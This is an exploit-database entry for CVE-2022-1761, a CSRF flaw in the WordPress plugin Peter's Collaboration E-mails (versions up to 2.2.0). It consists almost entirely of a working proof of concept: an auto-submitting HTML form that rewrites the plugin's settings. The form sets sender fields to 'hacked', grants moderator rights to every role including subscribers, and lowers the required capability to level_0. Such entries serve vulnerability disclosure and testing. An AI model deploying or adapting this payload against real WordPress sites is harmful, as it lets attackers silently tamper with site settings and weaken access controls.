Exploit for Peter’s Collaboration E-mails <= 2.2.0 - Arbitrary Settings Update via CSRF CVE-2022-1761

Name: Exploit for Peter’s Collaboration E-mails <= 2.2.0 - Arbitrary Settings Update via CSRF CVE-2022-1761
Rating: 5 (65 reviews)

2022-05-23 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:31B413E1-D4B5-463E-9910-37876881C062
<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
    <input type="text" name="pce_blogname" value="hacked">
    <input type="text" name="pce_fromaddress" value="hacked@example.com">
    <input type="text" name="pce_fromname" value="hacked">
    <input type="text" name="pce_whoapproved" value="1">
    <input type="text" name="pce_contributor_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="administrator">
    <input type="text" name="pce_moderator_roles[]" value="author">
    <input type="text" name="pce_moderator_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="editor">
    <input type="text" name="pce_moderator_roles[]" value="subscriber">
    <input type="text" name="pce_emails_to_send[]" value="pending">
    <input type="text" name="pce_emails_to_send[]" value="approved">
    <input type="text" name="pce_emails_to_send[]" value="future">
    <input type="text" name="pce_emails_to_send[]" value="backtodraft">
    <input type="text" name="pce_emails_to_send[]" value="wentlive">
    <input type="text" name="pce_emails_to_send[]" value="private_to_published">
    <input type="text" name="pce_emails_to_send[]" value="edited">
    <input type="text" name="pce_required_capability" value="level_0">
    <input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
    document.getElementById("test").submit();
</script>